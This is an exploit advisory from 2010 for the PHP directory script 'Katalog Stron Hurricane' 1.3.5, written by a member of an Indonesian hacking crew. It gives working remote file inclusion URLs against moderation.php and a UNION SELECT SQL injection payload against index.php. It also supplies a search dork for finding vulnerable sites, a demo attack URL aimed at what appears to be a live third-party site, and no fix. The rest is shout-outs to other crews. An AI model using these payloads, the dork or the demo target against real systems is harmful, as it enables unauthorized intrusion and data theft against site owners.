#############################################################################################################
## Katalog Stron Hurricane Multiple Vulnerability RFI / SQL ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 14 February, 2010 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.katalog.hurricane.pl/
[+] Download : http://www.katalog.hurricane.pl/download.html
[+] version : 1.3.5 or lower maybe also affected
[+] Vulnerability : RFI
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Here We go .. Live From Jogja City.. ]
[ RFI ]
http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDONESIANCODER]
[ BUG ]
[!] moderation.php
include($includes_directory.'population.php');
[ SQL ]
http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER]
[ XPL ]
6666+union+all+select+1,database(),3--
[ DEMO ]
http://server/includes/moderation.php?includes_directory=[EVILc0de]
http://www.bazastron.com.pl/index.php?inc=category&get=6666+union+all+select+1,database(),3--
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,Ibl13Z,Milo
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Ibl13Z : Turut berduka atas Flashdisknya gan
[+] Milo : Telpon MyQueen Terosss hhaa
[+] r3m1ck : KAYAK KUWEK Ojo Homok Yak .. ndak baik
[+] gonzhack : gua doain bro moga balikan .. hha ..
[+] for some one .. one day .. u will be mind .. >.<
[ QUOTE ]
[+] we are NOT DEAD INDONESIANCODER STILL r0x
[+] nothing secure ..